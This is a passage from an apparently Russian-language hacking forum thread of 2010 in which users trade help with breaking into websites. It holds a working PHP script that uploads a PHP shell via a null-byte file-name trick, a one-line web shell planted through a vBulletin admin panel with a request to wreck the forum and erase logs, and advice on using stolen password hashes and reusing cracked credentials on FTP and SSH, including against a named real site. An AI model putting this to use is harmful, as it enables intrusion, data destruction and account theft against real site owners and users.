Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. k2b1~

    k2b1~ Banned

    Joined:
    17 Jun 2010
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    on xz znaet magicu a otkuda znaet ekraniruetsya
     
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196

    Пробовал на CentOS, php5 - не работает, нуллбайт игнорируется и расширение .gif приписывается при MagicQuotes on и off
    На винде работает при MagicQuotes Off


    PHP:
    <?php
    $sh 
    '<?php phpinfo();?>';

    $conte =  "--ololo\r\n";
    $conte .= 'Content-Disposition: form-data; name="myname"' "\r\n\r\n";
    $conte .= 'shell.php' "\x00" "\r\n";
    $conte .= "--ololo\r\n";
    $conte .= 'Content-Disposition: form-data; name="picture"; filename="picture.jpg"' "\r\n";
    $conte .= "Content-Type: image/jpeg\r\n\r\n";
    $conte .= $sh "\r\n";
    $conte .= "--ololo--\r\n";
    post('http://host/script.php'$conte);


    function 
    post($url$cont){
    $url parse_url($url);
    $respons="";
    $postsock fsockopen($url['host'], 80$errno$errstr60);

    $head "POST {$url['path']} HTTP/1.1\r\n";
    $head .= "Host: {$url['host']}\r\n";
    $head .= "Connection: close\r\n";
    $head .= "Content-Length: " .strlen($cont). "\r\n";
    $head .= "Content-Type: multipart/form-data; boundary=ololo\r\n\r\n";
    $head .= $cont "\r\n";

    fwrite($postsock$head);

            while(!
    feof($postsock)){
                
    $respons .= fgets($postsock1024);
            }
    fclose($postsock);
    return 
    $respons;
    }
    ?>
     
    #14662 попугай, 28 Aug 2010
    Last edited: 28 Aug 2010
  3. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    одиг из вариантов с помощью XSS отправить запрос с данной страници
     
    1 person likes this.
  4. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    Вопрос есть доступ к базе ipb
    Table: ibf_members_converge
    Columns:
    converge_email
    converge_joined
    converge_pass_hash
    converge_pass_salt
    как мне сопоставить хеши к иду или юзернейму?куда еще рыть?
    в копирайтах вижу это
    Powered By IP.Board © 2010 IPS, Inc.
    спасибо за ответы
     
    #14664 Shadrin, 28 Aug 2010
    Last edited: 28 Aug 2010
  5. Pavel1987

    Pavel1987 New Member

    Joined:
    28 Aug 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    шелл для булки-4

    Привет!

    вроде бы читал много про уязвимости вбуллетина, зашел в админку и попробовал залить через модули шелл adminer (скачал с сайта). Но через поиск по справки выполнить запрос не получилось.

    Потом добавил еще один модуль с одной строчкой system($_GET["cmd"]);
    И через так www.xz.сom/forumpath/faq.php?cmd= попробовал выполнить запрос sql для тестового удаления юзера. Такая же байда(((

    Подскажите, что делаю ни так?
    Если кратко, то есть форум VBULLETIN-4 и админский доступ к нему. Нужно как то положить форум что бы он стал не восстановим.при этом желательно что бы следы взлома не были обнаружены типа ошибка бд и что то в этом роде, удалить логи как то надо короче.

    что посоветуете? заранее спасибо за помощь
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    www.xz.сom/forumpath/faq.php?cmd=command line commands
    EX:www.xz.сom/forumpath/faq.php?cmd=ls -la
     
    1 person likes this.
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    что за бред? это не инклюд...
     
  8. Pavel1987

    Pavel1987 New Member

    Joined:
    28 Aug 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    А комманд лайн - это что за команды? Через них форр повесить можно?)

    Т.е sql никак не покатит? я проста хотел сделать drop таблицы со всеми настройками, ну а потом и с логами))
     
  9. manerus

    manerus New Member

    Joined:
    10 Aug 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    вытащил хеши от админки, рашифровали, а они не подходят. В чём может быть причина!
    могу скинуть линк в пм!
     
  10. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    админок может быть сколько угодно, поищу другую админку. может таблица была ЮЗЕРОВ, а не АДМИНОВ?
    попробуй эти пассы к FTP, SSH...
     
  11. manerus

    manerus New Member

    Joined:
    10 Aug 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
     
    #14671 manerus, 29 Aug 2010
    Last edited: 29 Aug 2010
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    еще раз предупреждаю всех, без всяких ников.
    не дайте глупые советы которые только заблуждают пользователей, и не суйтесь в тему если вы в этом не разбираетесь.

    буду следить строго,и в следуюший раз если увижу такое то будете отвечать за такое "бредо-сообщение".
     
    _________________________
    1 person likes this.
  13. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    13
    Reputations:
    0
    Привет. Есть сайт http://www.pacificsun.com/, в нем таблица user, там мыло и пасс в тексте, всего 5 записей, в том числе webmaster@... , так что походу таблица касается админов. Пробовал найти админку - ничего не нашлось, только стандартная форма логина для обычных юзеров, куда не подходят данные. Подскажите, пожалуйста, куда таки надо вводить пароли?
     
  14. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    13
    Reputations:
    0
    В джумле админка в /administrator/ Туда пробовал вводить?
     
    1 person likes this.
  15. manerus

    manerus New Member

    Joined:
    10 Aug 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    да не подходит
     
  16. Pavel1987

    Pavel1987 New Member

    Joined:
    28 Aug 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Нашел команды юникса, комманд лайн этот, пишу короче:
    www.xz.сom/forumpath/faq.php?cmd=rm css.php (чтобы удалить файл css.php)

    И нифига. Выводится страница поиска по справке. В ВБ 4.0 это пофиксили чтоли?
    Через систему модулей добавлен модуль такого содержания: system($_GET["cmd"]);
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    скажи пожалуйста имя таблици откуда ты вытянул пароли,и в каком виде они хранялись.
     
    _________________________
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    а ты смотрел права есть на удаление? или думаешь что сразу рута получил?...почитайте перед тем как постить бред сивой кобылы..
    П.С. Радует одно что скоро всем вам в школу и прекратится бред и всякая чушь на ачате, хотя бы частично.
     
    1 person likes this.
  19. Pavel1987

    Pavel1987 New Member

    Joined:
    28 Aug 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Я читал, но не понел как получить права рута
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    сначала проверь работает вообще коммандная строка или нет, потом командой ls -al смотри свои права на файлы =\
     
    _________________________
    1 person likes this.
Thread Status:
Not open for further replies.